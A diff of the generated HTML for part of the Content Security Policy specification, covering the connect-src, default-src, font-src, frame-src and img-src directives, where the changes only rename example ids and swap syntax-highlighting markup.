   WebSocket <a data-link-type="biblio" href="#biblio-websockets">[WEBSOCKETS]</a> connections, though those aren’t technically part
   of Fetch.</p>
-    <div class="example" id="example-c53bdcd0">
-     <a class="self-link" href="#example-c53bdcd0"></a> JavaScript offers a few mechanisms that directly connect to an external
+    <div class="example" id="example-55db11da">
+     <a class="self-link" href="#example-55db11da"></a> JavaScript offers a few mechanisms that directly connect to an external
     server to send or receive information. <code>EventSource</code> maintains an open
     HTTP connection to a server in order to receive push notifications, <code>WebSockets</code> open a bidirectional communication channel between your
     browser and a server, and <code>XMLHttpRequest</code> makes arbitrary HTTP requests
@@ -3328,49 +3336,49 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
 </pre>
      <p>Fetches for the following code will all return network errors, as the URLs
     provided do not match <code>connect-src</code>'s <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists①">source list</a>:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>a</c-> <c- e>ping</c-><c- o>=</c-><c- s>"https://example.org"</c-><c- p>></c->...
-<c- p>&lt;</c-><c- f>script</c-><c- p>></c->
-  <c- a>var</c-> xhr <c- o>=</c-> <c- k>new</c-> XMLHttpRequest<c- p>();</c->
-  xhr<c- p>.</c->open<c- p>(</c-><c- t>'GET'</c-><c- p>,</c-> <c- t>'https://example.org/'</c-><c- p>);</c->
-  xhr<c- p>.</c->send<c- p>();</c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">a</span> <span class="na">ping</span><span class="o">=</span><span class="s">"https://example.org"</span><span class="p">></span>...
+<span class="p">&lt;</span><span class="nt">script</span><span class="p">></span>
+  <span class="kd">var</span> xhr <span class="o">=</span> <span class="k">new</span> XMLHttpRequest<span class="p">();</span>
+  xhr<span class="p">.</span>open<span class="p">(</span><span class="s1">'GET'</span><span class="p">,</span> <span class="s1">'https://example.org/'</span><span class="p">);</span>
+  xhr<span class="p">.</span>send<span class="p">();</span>
 
-  <c- a>var</c-> ws <c- o>=</c-> <c- k>new</c-> WebSocket<c- p>(</c-><c- u>"wss://example.org/"</c-><c- p>);</c->
+  <span class="kd">var</span> ws <span class="o">=</span> <span class="k">new</span> WebSocket<span class="p">(</span><span class="s2">"wss://example.org/"</span><span class="p">);</span>
 
-  <c- a>var</c-> es <c- o>=</c-> <c- k>new</c-> EventSource<c- p>(</c-><c- u>"https://example.org/"</c-><c- p>);</c->
+  <span class="kd">var</span> es <span class="o">=</span> <span class="k">new</span> EventSource<span class="p">(</span><span class="s2">"https://example.org/"</span><span class="p">);</span>
 
-  navigator<c- p>.</c->sendBeacon<c- p>(</c-><c- u>"https://example.org/"</c-><c- p>,</c-> <c- p>{</c-> <c- p>...</c-> <c- p>});</c->
-<c- p>&lt;/</c-><c- f>script</c-><c- p>></c->
+  navigator<span class="p">.</span>sendBeacon<span class="p">(</span><span class="s2">"https://example.org/"</span><span class="p">,</span> <span class="p">{</span> <span class="p">...</span> <span class="p">});</span>
+<span class="p">&lt;/</span><span class="nt">script</span><span class="p">></span>
 </pre>
     </div>
     <h5 class="heading settled algorithm" data-algorithm="connect-src Pre-request check" data-level="6.1.2.1" id="connect-src-pre-request"><span class="secno">6.1.2.1. </span><span class="content"> <code>connect-src</code> Pre-request check </span><a class="self-link" href="#connect-src-pre-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check③">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request②②">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③③">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>connect-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value①①">value</a>, and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="connect-src Post-request check" data-level="6.1.2.2" id="connect-src-post-request"><span class="secno">6.1.2.2. </span><span class="content"> <code>connect-src</code> Post-request check </span><a class="self-link" href="#connect-src-post-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check④">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request②③">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response①⑨">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③④">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>connect-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-response-to-source-list">§6.6.2.4 Does response to request match source list?</a> on <var>response</var>, <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value①②">value</a>,
   and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.3" id="directive-default-src"><span class="secno">6.1.3. </span><span class="content"><code>default-src</code></span><a class="self-link" href="#directive-default-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="default-src">default-src</dfn> directive serves as a fallback for the other <a data-link-type="dfn" href="#fetch-directives" id="ref-for-fetch-directives">fetch directives</a>. The syntax for the directive’s name and value is described by
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="default-src">default-src</dfn> directive serves as a fallback for the other <a data-link-type="dfn" href="#fetch-directives" id="ref-for-fetch-directives">fetch directives</a>. The syntax for the directive’s name and value is described by
   the following ABNF:</p>
 <pre>directive-name  = "default-src"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list②">serialized-source-list</a>
@@ -3379,8 +3387,8 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
   used as the policy’s default source list. That is, given <code>default-src 'none'; script-src 'self'</code>, script requests will use <code>'self'</code> as the <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists②">source
   list</a> to match against. Other requests will use <code>'none'</code>. This is spelled
   out in more detail in the <a href="#should-block-request">§4.1.3 Should request be blocked by Content Security Policy?</a> and <a href="#should-block-response">§4.1.4 Should response to request be blocked by Content Security Policy?</a> algorithms.</p>
-    <div class="example" id="example-327c55f5">
-     <a class="self-link" href="#example-327c55f5"></a> The following header: 
+    <div class="example" id="example-42710c39">
+     <a class="self-link" href="#example-42710c39"></a> The following header: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy⑤">Content-Security-Policy</a>: <a data-link-type="dfn" href="#default-src" id="ref-for-default-src②">default-src</a> <a data-link-type="grammar" href="#grammardef-self" id="ref-for-grammardef-self⑥">'self'</a>
 </pre>
      <p>will have the same behavior as the following header:</p>
@@ -3401,8 +3409,8 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
      <p>That is, when <code>default-src</code> is set, every <a data-link-type="dfn" href="#fetch-directives" id="ref-for-fetch-directives①">fetch directive</a> that isn’t
     explicitly set will fall back to the value <code>default-src</code> specifies.</p>
     </div>
-    <div class="example" id="example-8536160a">
-     <a class="self-link" href="#example-8536160a"></a> There is no inheritance. If a <code>script-src</code> directive is explicitly
+    <div class="example" id="example-1f09f5ba">
+     <a class="self-link" href="#example-1f09f5ba"></a> There is no inheritance. If a <code>script-src</code> directive is explicitly
     specified, for example, then the value of <code>default-src</code> has no influence on
     script requests. That is, the following header: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy⑦">Content-Security-Policy</a>: <a data-link-type="dfn" href="#default-src" id="ref-for-default-src③">default-src</a> <a data-link-type="grammar" href="#grammardef-self" id="ref-for-grammardef-self②⓪">'self'</a>; <a data-link-type="dfn" href="#script-src-elem" id="ref-for-script-src-elem①">script-src-elem</a> https://example.com
@@ -3431,11 +3439,11 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check④">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request②④">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③⑤">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>default-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return the result of executing the <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check⑤">pre-request check</a> for the <a data-link-type="dfn" href="#directives" id="ref-for-directives①⑦">directive</a> whose <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name①⓪">name</a> is <var>name</var> on <var>request</var> and <var>policy</var>, using
   this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value①③">value</a> for the comparison.</p>
     </ol>
@@ -3443,11 +3451,11 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check⑤">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request②⑤">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response②⓪">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③⑥">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>default-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return the result of executing the <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check⑥">post-request check</a> for the <a data-link-type="dfn" href="#directives" id="ref-for-directives①⑧">directive</a> whose <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name①①">name</a> is <var>name</var> on <var>request</var>, <var>response</var>, and <var>policy</var>, using this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value①④">value</a> for the
   comparison.</p>
     </ol>
@@ -3455,110 +3463,110 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
     <p>This directive’s <a data-link-type="dfn" href="#directive-inline-check" id="ref-for-directive-inline-check②">inline check</a> algorithm is as follows:</p>
     <p>Given an <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#element" id="ref-for-element②">Element</a></code> (<var>element</var>), a string (<var>type</var>), a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③⑦">policy</a> (<var>policy</var>) and a string (<var>source</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-inline-check">§6.7.2 Get the effective directive for inline checks</a> on <var>type</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>default-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Otherwise, return the result of executing the <a data-link-type="dfn" href="#directive-inline-check" id="ref-for-directive-inline-check③">inline check</a> for the <a data-link-type="dfn" href="#directives" id="ref-for-directives①⑨">directive</a> whose <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name①②">name</a> is <var>name</var> on <var>element</var>, <var>type</var>, <var>policy</var> and <var>source</var>, using this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value①⑤">value</a> for the
   comparison.</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.4" id="directive-font-src"><span class="secno">6.1.4. </span><span class="content"><code>font-src</code></span><a class="self-link" href="#directive-font-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="font-src">font-src</dfn> directive restricts the URLs from which font resources
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="font-src">font-src</dfn> directive restricts the URLs from which font resources
   may be loaded. The syntax for the directive’s name and value is described by
   the following ABNF:</p>
 <pre>directive-name  = "font-src"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list③">serialized-source-list</a>
 </pre>
-    <div class="example" id="example-97439923">
-     <a class="self-link" href="#example-97439923"></a> Given a page with the following Content Security Policy: 
+    <div class="example" id="example-9f9ed3a8">
+     <a class="self-link" href="#example-9f9ed3a8"></a> Given a page with the following Content Security Policy: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy⑨">Content-Security-Policy</a>: <a data-link-type="dfn" href="#font-src" id="ref-for-font-src③">font-src</a> https://example.com/
 </pre>
      <p>Fetches for the following code will return a network errors, as the URL
     provided do not match <code>font-src</code>'s <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists③">source list</a>:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>style</c-><c- p>></c->
-  <c- p>@</c-><c- k>font-face</c-> <c- p>{</c->
-    <c- f>font-family</c-><c- o>:</c-> <c- u>"Example Font"</c-><c- o>;</c->
-    <c- f>src</c-><c- o>:</c-> <c- f>url</c-><c- o>(</c-><c- u>"https://example.org/font"</c-><c- o>);</c->
-  <c- p>}</c->
-  <c- f>body</c-> <c- p>{</c->
-    <c- k>font-family</c-><c- p>:</c-> <c- u>"Example Font"</c-><c- p>;</c->
-  <c- p>}</c->
-<c- p>&lt;/</c-><c- f>style</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">style</span><span class="p">></span>
+  <span class="p">@</span><span class="k">font-face</span> <span class="p">{</span>
+    <span class="nt">font-family</span><span class="o">:</span> <span class="s2">"Example Font"</span><span class="o">;</span>
+    <span class="nt">src</span><span class="o">:</span> <span class="nt">url</span><span class="o">(</span><span class="s2">"https://example.org/font"</span><span class="o">);</span>
+  <span class="p">}</span>
+  <span class="nt">body</span> <span class="p">{</span>
+    <span class="k">font-family</span><span class="p">:</span> <span class="s2">"Example Font"</span><span class="p">;</span>
+  <span class="p">}</span>
+<span class="p">&lt;/</span><span class="nt">style</span><span class="p">></span>
 </pre>
     </div>
     <h5 class="heading settled algorithm" data-algorithm="font-src Pre-request check" data-level="6.1.4.1" id="font-src-pre-request"><span class="secno">6.1.4.1. </span><span class="content"> <code>font-src</code> Pre-request check </span><a class="self-link" href="#font-src-pre-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check⑥">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request②⑥">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③⑧">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>font-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value①⑥">value</a>, and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="font-src Post-request check" data-level="6.1.4.2" id="font-src-post-request"><span class="secno">6.1.4.2. </span><span class="content"> <code>font-src</code> Post-request check </span><a class="self-link" href="#font-src-post-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check⑦">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request②⑦">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response②①">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③⑨">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>font-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-response-to-source-list">§6.6.2.4 Does response to request match source list?</a> on <var>response</var>, <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value①⑦">value</a>,
   and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.5" id="directive-frame-src"><span class="secno">6.1.5. </span><span class="content"><code>frame-src</code></span><a class="self-link" href="#directive-frame-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="frame-src">frame-src</dfn> directive restricts the URLs which may be loaded into <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#nested-browsing-context" id="ref-for-nested-browsing-context②">nested browsing contexts</a>. The syntax for the directive’s name and value
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="frame-src">frame-src</dfn> directive restricts the URLs which may be loaded into <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#nested-browsing-context" id="ref-for-nested-browsing-context②">nested browsing contexts</a>. The syntax for the directive’s name and value
   is described by the following ABNF:</p>
 <pre>directive-name  = "frame-src"
 directive-value = <a data-link-type="grammar" href="#grammardef-serialized-source-list" id="ref-for-grammardef-serialized-source-list④">serialized-source-list</a>
 </pre>
-    <div class="example" id="example-0aea3777">
-     <a class="self-link" href="#example-0aea3777"></a> Given a page with the following Content Security Policy: 
+    <div class="example" id="example-3e611aa9">
+     <a class="self-link" href="#example-3e611aa9"></a> Given a page with the following Content Security Policy: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy①⓪">Content-Security-Policy</a>: <a data-link-type="dfn" href="#frame-src" id="ref-for-frame-src②">frame-src</a> https://example.com/
 </pre>
      <p>Fetches for the following code will return a network errors, as the URL
     provided do not match <code>frame-src</code>'s <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists④">source list</a>:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>iframe</c-> <c- e>src</c-><c- o>=</c-><c- s>"https://example.org/"</c-><c- p>></c->
-<c- p>&lt;/</c-><c- f>iframe</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">iframe</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://example.org/"</span><span class="p">></span>
+<span class="p">&lt;/</span><span class="nt">iframe</span><span class="p">></span>
 </pre>
     </div>
     <h5 class="heading settled algorithm" data-algorithm="frame-src Pre-request check" data-level="6.1.5.1" id="frame-src-pre-request"><span class="secno">6.1.5.1. </span><span class="content"> <code>frame-src</code> Pre-request check </span><a class="self-link" href="#frame-src-pre-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check⑦">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request②⑧">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object④⓪">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>frame-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value①⑧">value</a>, and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="frame-src Post-request check" data-level="6.1.5.2" id="frame-src-post-request"><span class="secno">6.1.5.2. </span><span class="content"> <code>frame-src</code> Post-request check </span><a class="self-link" href="#frame-src-post-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check⑧">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request②⑨">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response②②">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object④①">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>frame-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-response-to-source-list">§6.6.2.4 Does response to request match source list?</a> on <var>response</var>, <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value①⑨">value</a>,
   and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.6" id="directive-img-src"><span class="secno">6.1.6. </span><span class="content"><code>img-src</code></span><a class="self-link" href="#directive-img-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="img-src">img-src</dfn> directive restricts the URLs from which image resources
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="img-src">img-src</dfn> directive restricts the URLs from which image resources
   may be loaded. The syntax for the directive’s name and value is described by
   the following ABNF:</p>
 <pre>directive-name  = "img-src"
@@ -3566,150 +3574,150 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
 </pre>
     <p>This directive controls <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request③⓪">requests</a> which load images. More formally, this
   includes <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request③①">requests</a> whose <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-destination" id="ref-for-concept-request-destination③">destination</a> is "<code>image</code>" <a data-link-type="biblio" href="#biblio-fetch">[FETCH]</a>.</p>
-    <div class="example" id="example-ad572c5c">
-     <a class="self-link" href="#example-ad572c5c"></a> Given a page with the following Content Security Policy: 
+    <div class="example" id="example-180549a3">
+     <a class="self-link" href="#example-180549a3"></a> Given a page with the following Content Security Policy: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy①①">Content-Security-Policy</a>: <a data-link-type="dfn" href="#img-src" id="ref-for-img-src②">img-src</a> https://example.com/
 </pre>
      <p>Fetches for the following code will return a network errors, as the URL
     provided do not match <code>img-src</code>'s <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists⑤">source list</a>:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>img</c-> <c- e>src</c-><c- o>=</c-><c- s>"https://example.org/img"</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://example.org/img"</span><span class="p">></span>
 </pre>
     </div>
     <h5 class="heading settled algorithm" data-algorithm="img-src Pre-request check" data-level="6.1.6.1" id="img-src-pre-request"><span class="secno">6.1.6.1. </span><span class="content"> <code>img-src</code> Pre-request check </span><a class="self-link" href="#img-src-pre-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check⑧">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request③②">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object④②">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>img-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-request-to-source-list">§6.6.2.3 Does request match source list?</a> on <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value②⓪">value</a>, and <var>policy</var>,
   is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
     <h5 class="heading settled algorithm" data-algorithm="img-src Post-request check" data-level="6.1.6.2" id="img-src-post-request"><span class="secno">6.1.6.2. </span><span class="content"> <code>img-src</code> Post-request check </span><a class="self-link" href="#img-src-post-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check⑨">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request③③">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response②③">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object④③">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>frame-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#match-response-to-source-list">§6.6.2.4 Does response to request match source list?</a> on <var>response</var>, <var>request</var>, this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value②①">value</a>,
   and <var>policy</var>, is "<code>Does Not Match</code>", return "<code>Blocked</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return "<code>Allowed</code>".</p>
     </ol>
